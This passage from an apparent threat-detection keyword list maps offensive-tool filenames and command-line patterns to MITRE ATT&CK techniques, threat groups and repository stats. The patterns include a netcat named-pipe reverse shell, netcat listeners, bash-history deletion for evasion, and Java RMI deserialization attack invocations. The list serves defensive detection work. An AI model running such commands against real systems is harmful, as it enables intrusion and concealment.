T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,1,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*reveng007/DarkWidow*,offensive_tool_keyword,DarkWidow,Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing,T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - 
T1070.004 - T1036 - T1134 - T1140,TA0005 - TA0003 - TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/reveng007/DarkWidow,1,1,N/A,10,3,268,38,2023-08-03T22:37:44Z,2023-07-24T13:59:16Z -*reveng007/Executable_Files*,offensive_tool_keyword,Executable_Files,Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well,T1071 - T1071.001 - T1105 - T1041 - T1102,TA0011 - TA0005 - TA0010,N/A,N/A,Exploitation tools,https://github.com/reveng007/Executable_Files,1,1,N/A,10,1,7,2,2023-09-07T08:36:28Z,2021-12-10T15:04:35Z -*reveng007/ReflectiveNtdll*,offensive_tool_keyword,ReflectiveNtdll,A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode,T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/reveng007/ReflectiveNtdll,1,1,N/A,10,2,147,22,2023-02-10T05:30:28Z,2023-01-30T08:43:16Z -*reveng007/SharpGmailC2*,offensive_tool_keyword,SharpGmailC2,Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol,T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001,TA0011 - TA0040 - TA0001,N/A,N/A,C2,https://github.com/reveng007/SharpGmailC2,1,1,N/A,10,10,242,40,2022-12-27T01:45:46Z,2022-11-10T06:48:15Z -*reverse_shell_minified.js*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,1,private github repo,10,,N/A,,, -*reverse_tcp_x64.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. 
exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*reverse_win_http.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*reverseDisableWinDef.cpp*,offensive_tool_keyword,WinDefenderKiller,Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys,T1562.001 - T1055.002 - T1070.004,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/S12cybersecurity/WinDefenderKiller,1,1,N/A,10,4,327,47,2023-07-27T11:06:24Z,2023-07-25T10:32:25Z -*ReverseProxy.dll*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,1,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*ReverseShell.ps1*,offensive_tool_keyword,Windows-Privilege-Escalation,Windows Privilege Escalation Techniques and Scripts,T1055 - T1548 - T1078,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/frizb/Windows-Privilege-Escalation,1,1,N/A,N/A,8,710,185,2020-03-25T22:35:02Z,2017-05-12T13:09:50Z -*ReverseShell_20*.ps1*,offensive_tool_keyword,PSSW100AVB,This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense Evasion,https://github.com/tihanyin/PSSW100AVB,1,1,N/A,N/A,10,983,166,2022-06-18T16:52:38Z,2021-10-08T17:36:24Z -*ReverseSocksProxyHandler.*,offensive_tool_keyword,Invoke-SocksProxy,Socks proxy - and reverse socks server using powershell.,T1090 - T1021.001 - T1021.002,TA0002,N/A,N/A,C2,https://github.com/p3nt4/Invoke-SocksProxy,1,1,N/A,10,10,742,176,2021-03-21T21:00:40Z,2017-11-09T06:20:40Z 
-*ReverseSocksProxyHandler.py*,offensive_tool_keyword,Invoke-SocksProxy,Socks proxy - and reverse socks server using powershell.,T1090 - T1021.001 - T1021.002,TA0002,N/A,N/A,C2,https://github.com/p3nt4/Invoke-SocksProxy,1,1,N/A,10,10,742,176,2021-03-21T21:00:40Z,2017-11-09T06:20:40Z -*ReversingID/Shellcode-Loader*,offensive_tool_keyword,Shellcode-Loader,dynamic shellcode loading,T1055 - T1055.012 - T1027 - T1027.005,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/ReversingID/Shellcode-Loader,1,1,N/A,10,2,139,30,2023-09-08T06:55:34Z,2021-08-08T08:53:03Z -*RevertToSelf was successful*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*Revoke-Obfuscation*,offensive_tool_keyword,Invoke-DOSfuscation,Revoke-Obfuscation is a PowerShell v3.0+ compatible PowerShell obfuscation detection framework. 
used for de obfuscating powershell scripts,T1027 - T1083 - T1059,TA0002 - TA0007 - TA0040,N/A,N/A,Defense Evasion,https://github.com/danielbohannon/Revoke-Obfuscation,1,1,N/A,N/A,7,667,121,2020-02-11T19:40:37Z,2017-07-11T01:20:48Z -*RevWinDefKiller.exe*,offensive_tool_keyword,WinDefenderKiller,Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys,T1562.001 - T1055.002 - T1070.004,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/S12cybersecurity/WinDefenderKiller,1,1,N/A,10,4,327,47,2023-07-27T11:06:24Z,2023-07-25T10:32:25Z -*RhinoSecurityLabs*,offensive_tool_keyword,Github Username,github repo hosting exploitation tools for pentesters,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/RhinoSecurityLabs,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*RhinoSecurityLabs/pacu*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,1,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z -*-Rhost * -Port * -Cmd *cmd /c*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Exploit-Jenkins.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*rhosts_walker_spec.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*RiccardoAncarani/BOFs*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOFs) for shells and lols,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RiccardoAncarani/BOFs,1,1,N/A,10,10,104,12,2021-09-14T09:03:58Z,2021-08-27T10:04:12Z -*RiccardoAncarani/LiquidSnake*,offensive_tool_keyword,cobaltstrike,LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/RiccardoAncarani/LiquidSnake,1,1,N/A,10,10,306,47,2021-09-01T11:53:30Z,2021-08-31T12:23:01Z -*RiccardoAncarani/TaskShell*,offensive_tool_keyword,cobaltstrike,tamper scheduled task with a binary,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/RiccardoAncarani/TaskShell,1,1,N/A,10,10,54,8,2021-02-15T19:23:13Z,2021-02-15T19:22:26Z -*rid_hijack.py*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,1,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z -*ridbrute_attack*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*ridrelay*,offensive_tool_keyword,ridrelay,Quick and easy way to get domain usernames while on an internal network.,T1175 - T1553.002 - T1553.003,TA0003 - TA0008 - TA0009,N/A,N/A,Sniffing & Spoofing,https://github.com/skorov/ridrelay,1,0,N/A,N/A,4,375,62,2020-05-20T03:35:32Z,2018-04-14T22:10:01Z -*Ripemd-160.test-vectors.txt*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*rkervella/CarbonMonoxide*,offensive_tool_keyword,cobaltstrike,EDR Evasion - Combination of SwampThing - TikiTorch,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rkervella/CarbonMonoxide,1,1,N/A,10,10,21,12,2020-05-28T10:40:20Z,2020-05-15T09:32:25Z -*rlwrap -cAr nc -lvnp *,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -*rlwrap nc -lvnp *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*rm .bash_history*,greyware_tool_keyword,bash,Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.,T1070.004 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*rm /home/*/.bash_history*,greyware_tool_keyword,bash,Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.,T1070.004 - 
T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*rm /root/.bash_history*,greyware_tool_keyword,bash,Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.,T1070.004 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml,1,0,greyware tool - risks of False positive !,N/A,10,1611,397,2023-10-03T22:19:32Z,2020-06-17T21:48:18Z -*rm -f *.o dump_vdso test_payload*,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/timwr/CVE-2016-5195,1,0,N/A,N/A,10,935,404,2021-02-03T16:03:40Z,2016-10-21T11:19:21Z -*rm -f backpipe* mknod /tmp/backpipe p && nc *,greyware_tool_keyword,shell,Reverse Shell Command Line,T1105 - T1021.001 - T1021.002,TA0002 - TA0008,N/A,N/A,shell spawning,https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml,1,0,greyware tool - risks of False positive !,N/A,10,6749,1943,2023-10-03T04:55:17Z,2016-12-24T09:48:49Z -*rmg bind * jmxrmi --bind-objid *,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*rmg bind *127.0.0.1:*--localhost-bypass*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and 
verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*rmg call * --plugin GenericPrint.jar*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*rmg call * --signature * --bound-name plain-server*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*rmg codebase *http* --component *,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*rmg codebase *java.util.HashMap *--bound-name legacy-service*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability 
Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*rmg enum *,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*rmg guess * *,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*rmg known javax.management.remote.rmi.RMIServerImpl_Stub*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*rmg listen * CommonsCollections*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*rmg listen 0.0.0.0 *,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and 
verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*rmg objid *[*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*rmg roguejmx *,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*rmg scan *,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*rmg scan * --ports *,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*rmg serial * AnTrinh * --component 
*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*rmg serial *CommonsCollections*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*rmg-*-jar-with-dependencies.jar*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,1,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*rmg*--yso*,offensive_tool_keyword,remote-method-guesser,remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.,T1210.002 - T1046 - T1078.003,TA0001 - TA0007 - TA0040,N/A,N/A,Vulnerability Scanner,https://github.com/qtc-de/remote-method-guesser,1,0,N/A,6,8,708,118,2023-10-03T06:22:32Z,2019-11-04T11:37:38Z -*RMIRegistryExploit.java*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
